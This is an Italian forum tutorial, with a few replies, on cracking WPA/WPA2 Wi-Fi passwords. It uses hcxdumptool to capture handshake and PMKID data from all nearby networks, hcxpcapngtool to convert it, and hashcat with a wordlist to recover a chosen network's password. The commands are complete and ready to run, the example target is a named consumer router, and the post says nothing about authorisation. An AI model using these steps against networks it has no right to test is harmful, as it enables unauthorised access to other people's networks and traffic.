Guida Craccare una rete WPA/WPA2 con hashcat e hcxdumptool

22 Febbraio 2022
475
42
353
350
Ultima modifica:
Oggi vediamo come craccare una rete WPA/WPA2 utlizzando hashcat, hcxdumptool e hcxpcapngtool, il vantaggio di questo metodo è che nessun client deve essere collegato alla rete, a differenza della suite di Aircrack-ng, Questo metodo personalemente lo userei solo se nessun client è connesso, essendo che è un po più lungo rispetto al crack con aircrack-ng.
Hashcat e installato di default, ma gli altri due no, quindi lo facciamo noi manualmente:
Bash:
sudo apt update
sudo apt install hcxdumptool
sudo apt install hcxpcapngtool
Se non siete su Kali dovete clonare la repository di github e installare hashcat:
Bash:
sudo apt update
sudo apt install hashcat
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config
make
make install (as super user)
Ora è tutto pronto. possiamo iniziare

1. Stoppare i servizi di rete
Come prima cosa andiamo a stoppare i servizi di rete :
Bash:
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
Ora possiamo partire veramente.

2. Catturare informazioni con hcxdumptool
Adesso con hcxdumptool andiamo a catturare tutte le reti Wi-Fi:
Bash:
sudo hcxdumptool -i wlan0 -o capture.pcapng --active_beacon --enable_status=1
hcsdump.png
Tutto le info che hcxdump riuscirà a prendere andranno nel file dumpfile.pcapng.
Ora possiamo startare nuovamente i servizi di rete:
Bash:
sudo systemctl start NetworkManager.service
sudo systemctl start wpa_supplicant.service
Ora convertiamo il file .pcapng in un file .hc22000 in modo che hashcat possa craccarlo:
Codice:
sudo hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
Scriviamo ls per vedere il contenuto della directory, come si può vedere sono stati creati due file nuovi:
  • hash.hc22000
  • essidlist
Mostriamo a schermo il file essidlist con il comando cat:
essid2022-06-18_08-12-26.png
Quest'ultimo contiene tutti gli essid delle reti che hcxdumptool è riuscito ad individuare, quella che ci interessa a noi e Wind3 HUB-7C435E.

3. Scoprire il MAC address delle reti con hcxdumptool
Ora dobbiamo nuovamente stoppare i servizi di rete, una volta fatto questo mettiamo il comando, partirà una scansione in stile Airodump-ng:
Bash:
hcxpdumptool --do_rcascan -i wlan0
mac-address.png
Salviamoci il MAC address e apriamo con la GUI il file hash.hc22000, CTRL+F e mettiamo nella barra di ricerca il MAC address della rete che vogliamo craccare, nel mio caso è b8d5267c435e:
mac-ctrlf.png
Ora elimiano tutti gli altri hash e teniamo solo l'hash della rete che vogliamo attaccare.

4. Session-Cracking con Hashcat
Ora passiamo alla parte più bella, quella di crack, usiamo o creiamo una wordlist, per vedere le wordlist su Kali bisogna andare nella directory /usr/share/wordlist, io ho creato la mia, crackthiswifi.txt, scriviamo:
Codice:
hashcat -m 22000 hash.hc22000 crackthiswifi.txt #voi ovviamente dovete mettere il path della vostra wordlist
crack-session.png
Ora aspettiamo che Hashcat finisca, da VM sarà abbastanza lento, semmai spostate il file con l'hash sul proprio main OS(Sia Windows, Linux e Mac OS).
Crediti: David Bombal
 
Io preferirei usare sempre questo metodo perchè hashcat è molto più ottimizzato di aircrack e usando la gpu si va anche molto più veloci.
Se uno non ha una buona gpu può usare --force per usare la cpu
 
  • Incredibile
Reazioni: hackynonpointer
quindi è un'alternativa a airmon-ng ma fa lo stesso tipo di attacco o ho capito male?
cattura un handshake e poi tenta di crackarlo bruteforcando con una wordlist, se non ho capito male...